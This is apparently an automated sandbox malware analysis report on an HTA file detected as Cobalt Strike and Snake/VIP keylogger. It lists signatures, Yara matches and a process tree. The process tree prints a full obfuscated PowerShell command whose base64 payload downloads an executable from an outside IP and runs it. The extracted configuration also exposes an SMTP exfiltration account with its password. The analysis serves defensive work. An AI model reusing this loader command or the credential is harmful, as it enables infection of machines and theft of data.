Edit tour
Windows
Analysis Report
wekissingbestgirleveryseenwithmygirl.hta
Overview
General Information
| Sample name: | wekissingbestgirleveryseenwithmygirl.hta |
| Analysis ID: | 1636661 |
| MD5: | 5fa0f6929099205c09e3d67ae8f91544 |
| SHA1: | 5ecc01c5efeb5971c5fd10c41125212dd44103f6 |
| SHA256: | 33afc4e7ef1f4dea4b50f62c25612df94db566e7b9986b33a66bbc7c93f3d222 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, Snake Keylogger, VIP Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7628 cmdline: mshta.exe "C:\Users\ user\Deskt op\wekissi ngbestgirl everyseenw ithmygirl. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 7720 cmdline: "C:\Window s\system32 \cmd.exe" "/C PoWerS hELL.EXe -EX bypAS S -N op - w 1 -C DEVic ecrEDEntIa LDEPlOyMeN t.eXe ; IEx($(ieX( '[SyStEm.t eXT.EncODi NG]'+[chaR ]58+[cHAR] 58+'utF8.g EtsTRIng([ SysTEM.COn Vert]'+[cH Ar]0X3A+[C hAR]0X3a+' fRoMBase64 stRiNG('+[ CHAR]0x22+ 'JDlwU21Yb VRGcDUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gPSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBhZ EQtVFlwZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtbWVtY mVyZGVmaW5 JVElvbiAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAnW0RsbEl tcG9ydCgid XJMTU9OIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQ2hhc lNldCA9IEN oYXJTZXQuV W5pY29kZSl dcHVibGljI HN0YXRpYyB leHRlcm4gS W50UHRyIFV STERvd25sb 2FkVG9GaWx lKEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBqSnN LTixzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgaCx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgbSx1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHNhb 3FzRGpjWkQ sSW50UHRyI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENXTEt sVyk7JyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtbkFNRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiU093W iIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 hTUVTUEFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBsYlB hICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIC1QY XNzVGhydTs gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJDlwU 21YbVRGcDU 6OlVSTERvd 25sb2FkVG9 GaWxlKDAsI mh0dHA6Ly8 xOTguMTIuO DkuMjQvMzE yL2Nvc3NlL mV4ZSIsIiR lTlY6QVBQR EFUQVxjb3N zZS5leGUiL DAsMCk7c1R BclQtc2xFZ VAoMyk7SU5 2T2tFLUl0R W0gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIiR FbnY6QVBQR EFUQVxjb3N zZS5leGUi' +[ChAR]0X2 2+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7764 cmdline: PoWerShELL .EXe -EX bypASS -Nop -w 1 -C DEVicecr EDEntIaLDE PlOyMeNt.e Xe ; IEx ($(ieX('[S yStEm.teXT .EncODiNG] '+[chaR]58 +[cHAR]58+ 'utF8.gEts TRIng([Sys TEM.COnVer t]'+[cHAr] 0X3A+[ChAR ]0X3a+'fRo MBase64stR iNG('+[CHA R]0x22+'JD lwU21YbVRG cDUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgPS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBhZEQt VFlwZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbWVtYmVy ZGVmaW5JVE lvbiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgidXJM TU9OIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgQ2hhclNl dCA9IENoYX JTZXQuVW5p Y29kZSldcH VibGljIHN0 YXRpYyBleH Rlcm4gSW50 UHRyIFVSTE Rvd25sb2Fk VG9GaWxlKE ludFB0ciAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBqSnNLTi xzdHJpbmcg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgaCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg bSx1aW50IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHNhb3Fz RGpjWkQsSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENXTEtsVy k7JyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt bkFNRSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiU093WiIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLU5hTU VTUEFDZSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBsYlBhIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIC1QYXNz VGhydTsgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJDlwU21Y bVRGcDU6Ol VSTERvd25s b2FkVG9GaW xlKDAsImh0 dHA6Ly8xOT guMTIuODku MjQvMzEyL2 Nvc3NlLmV4 ZSIsIiRlTl Y6QVBQREFU QVxjb3NzZS 5leGUiLDAs MCk7c1RBcl Qtc2xFZVAo Myk7SU52T2 tFLUl0RW0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIiRFbn Y6QVBQREFU QVxjb3NzZS 5leGUi'+[C hAR]0X22+' ))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 7900 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\3cq15gru \3cq15gru. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7916 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SC5AC.tmp" "c:\Users \user\AppD ata\Local\ Temp\3cq15 gru\CSC808 6F2D2BF6D4 7B784DFAC2 ECA9CF431. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
cosse.exe (PID: 8124 cmdline: "C:\Users\ user\AppDa ta\Roaming \cosse.exe " MD5: 4397E5BC5BC3C6D79B917B17E8B122F3) - RegSvcs.exe (PID: 8168 cmdline:
"C:\Users\ user\AppDa ta\Roaming \cosse.exe " MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- svchost.exe (PID: 7972 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| 404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "SMTP", "Email ID": "michael@cliftonfinances.com", "Password": "Acess2code", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}{"Exfil Mode": "SMTP", "Username": "michael@cliftonfinances.com", "Password": "Acess2code", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 15 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
| MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
| |
| Click to see the 13 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Michael Haag: | ||